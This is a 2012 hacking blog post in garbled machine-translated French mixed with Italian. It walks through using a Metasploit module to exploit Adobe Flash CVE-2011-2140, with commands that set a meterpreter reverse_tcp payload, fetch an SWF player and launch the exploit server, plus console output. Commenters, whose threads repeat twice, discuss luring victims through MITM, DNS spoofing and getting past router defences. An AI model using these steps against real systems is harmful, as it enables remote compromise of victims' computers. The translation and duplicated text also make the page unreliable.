ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit]Exécution de code à distance Flash Player

Posté le: 10 Février 2012

Nouveau module ajouté à Metasploit :D che sfrutta un'ulteriore bug Flash Player.

Vulnérabilité indiquée par le CVE-2011-2140, Voici les détails:

Adobe Flash Player avant de 10.3.183.5 sur Windows, Mac OS X, Linux, et Solaris, et avant 10.3.186.3 on Android, et Adobe AIR avant 2.7.1 sur Windows et Mac OS X et avant 2.7.1.1961 on Asur Androidrmet à des attaquants d'exécuter du code arbitraire ou de provoquer un déni de service (corruption de la mémoire) par des vecteurs non spécifiés, une vulnérabilité différente de celle CVE-2011-2135, CVE-2011-2417, et CVE-2011-2425.

Adobe Flash Player MP4 Buffer Overflow SequenceParameterSetNALUnit

Voyons comment utiliser Metasploit :D

La première chose à faire est de mettre à jour Metasploit:
sudo msfupdate

Maintenant avviamo Metasploit:
sudo msfconsole

Usiamo l'exploiter:
use exploit/windows/browser/adobe_flash_sps

Les commandes sont toujours ceux :D
Charge Settiamo:
set PAYLOAD windows/meterpreter/reverse_tcp
Il Configuriamo charge:
set LHOST MY_IP
L'Configuriamo exploiter:
set URIPATH /

Adesso settiamo il lecteur SWF, J'ai pris de la poc abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

L'partire Facciamo exploiter:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Amusez-vous :D

Nous envoyons notre victime sur notre ip:PORT , ARBRE e :D

Related posts:

  1. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Excution de code à distance
  2. IE 6/7 EXPLOITER XML Exécution de code à distance avec Metasploit
  3. [CVE:2011-4862] À distance de racine FreeBSD
  4. [CVE-2011-3544]Metasploit: Java Remote non fiable Java Web Start
  5. [CVE-2010-2568]Metasploit:fenêtres Exuction Oday de code à distance

Cette entrée a été publiée le vendredi, 10 février, 2012 à 9:39 am et est classé dans GNU / Linux, Piratage, Logiciel. Vous pouvez suivre les réponses à cette entrée à travers le RSS 2.0 nourrir. Vous pouvez laisser une réponse, ou trackback à partir de votre propre site.

Tagged avec:
  • Salzo

    CIAO quêtes ma funziona exploiter la télécommande?

    • Ac1d

      Qual Scusa dit l'exécution de code à distance n'est pas vous et Chiara?

  • Salzo

    CIAO quêtes ma funziona exploiter la télécommande?

    • Ac1d

      Qual Scusa dit l'exécution de code à distance n'est pas vous et Chiara?

  • Anonyme

    Mais il est un des exploits côté client doit passer le lien à la victime ;) 
    Par exemple par une attaque http://www.clshack.com/?s=mitm

    • Formats Simone

      alors bien sûr je dois entrer navigateur de la victime sur mon ip avec le port ?
      s'attaquer à certains’ insensé :-D

      • Anonyme

        Si vous êtes dans le réseau local, ou vous pouvez faire une attaque de type MITM peut exploiter certaines des xss différents sites, e così via… est stupide :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          si vous devez également exécuter un DNS local spoof…o sbaglio?

          • Anonyme

            Vous pouvez faire une parodie simples ;) 

        • Formats Simone

          BBB se ovviamente, mais vous avez toujours de dire à la victime de saisir le lien à cette adresse avec le port! pour le faire fonctionner…
          :-D

  • ClsHackBlog

    Mais il est un des exploits côté client doit passer le lien à la victime ;) 
    Par exemple par une attaque http://www.clshack.com/?s=mitm

    • Formats Simone

      alors bien sûr je dois entrer navigateur de la victime sur mon ip avec le port ?
      s'attaquer à certains’ insensé :-D

      • ClsHackBlog

        Si vous êtes dans le réseau local, ou vous pouvez faire une attaque de type MITM peut exploiter certaines des xss différents sites, e così via… est stupide :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          si vous devez également exécuter un DNS local spoof…o sbaglio?

          • ClsHackBlog

            Vous pouvez faire une parodie simples ;) 

        • Formats Simone

          BBB se ovviamente, mais vous avez toujours de dire à la victime de saisir le lien à cette adresse avec le port! pour le faire fonctionner…
          :-D

  • Zigfried Zorba

    Cet exploit ne fonctionne pas avec Windows XP SP3..

    • Anonyme

      Essayez à jour :)

  • Zigfried Zorba

    Cet exploit ne fonctionne pas avec Windows XP SP3..

    • ClsHackBlog

      Essayez à jour :)

  • zacky

    Mais maintenant, les routeurs modernes arrêter les attaques MITM et de bloquer la connexion à la victime (Il m'arrive avec la station de Vodafone par exemple) vous pouvez faire pour contourner cette chose?

    • Anonyme

      Si vous n'êtes pas locale, si vous êtes à distance, vous devez trouver une autre façon de faire la victime rendirect nattato votre adresse IP pour l'extérieur :) 

      • zacky

        sisi ça veut dire localement .. utilisant ettercap parfois à cause de la protection interne de certains routeurs (du moins je pense) l'attaque ne réussit pas et le trafic de la victime est bloquée et ne sont plus en mesure de naviguer!! Qu'est-ce que vous pouvez faire dans ces cas?

        • Anonyme

          comprendre le problème est parfois un problème dans ettercap :D

          Que j'utilise pour faire MITM scapy et vous trouver quelque chose ici sur le blog ;)Sinon envoyer le lien à la victime :D

          • zacky

            Donc, je crois qu'il est temps d'essayer et installaro hehe ;)

          • zacky

            essayé, mais rien est mon vodafone station de sgama le mac et j'ai dupliqué bloque le trafic :S

  • zacky

    Mais maintenant, les routeurs modernes arrêter les attaques MITM et de bloquer la connexion à la victime (Il m'arrive avec la station de Vodafone par exemple) vous pouvez faire pour contourner cette chose?

    • ClsHackBlog

      Si vous n'êtes pas locale, si vous êtes à distance, vous devez trouver une autre façon de faire la victime rendirect nattato votre adresse IP pour l'extérieur :) 

      • zacky

        sisi ça veut dire localement .. utilisant ettercap parfois à cause de la protection interne de certains routeurs (du moins je pense) l'attaque ne réussit pas et le trafic de la victime est bloquée et ne sont plus en mesure de naviguer!! Qu'est-ce que vous pouvez faire dans ces cas?

        • ClsHackBlog

          comprendre le problème est parfois un problème dans ettercap :D

          Que j'utilise pour faire MITM scapy et vous trouver quelque chose ici sur le blog ;)Sinon envoyer le lien à la victime :D

          • zacky

            Donc, je crois qu'il est temps d'essayer et installaro hehe ;)

          • zacky

            essayé, mais rien est mon vodafone station de sgama le mac et j'ai dupliqué bloque le trafic :S

  • Unknownita

    ho une domanda, mais si je fais une dsnspoof comme changer les DNS dans le routeur en redirigeant PC de la victime infectée sur l'adresse. Puis, après pas pire? parce que l'utilisateur va taper à chaque fois http://www.google.it fin de la zone infectée? il ya une plus grande transparence?qui sera certainement comprendre que quelque chose cloche..

    • Unknownita

      Peut-être une solution pourrait être de le diriger vers ma page blanche, qui redirige ensuite le tot seconde après le site actuel?

  • Unknownita

    ho une domanda, mais si je fais une dsnspoof comme changer les DNS dans le routeur en redirigeant PC de la victime infectée sur l'adresse. Puis, après pas pire? parce que l'utilisateur va taper à chaque fois http://www.google.it fin de la zone infectée? il ya une plus grande transparence?qui sera certainement comprendre que quelque chose cloche..

    • Unknownita

      Peut-être une solution pourrait être de le diriger vers ma page blanche, qui redirige ensuite le tot seconde après le site actuel?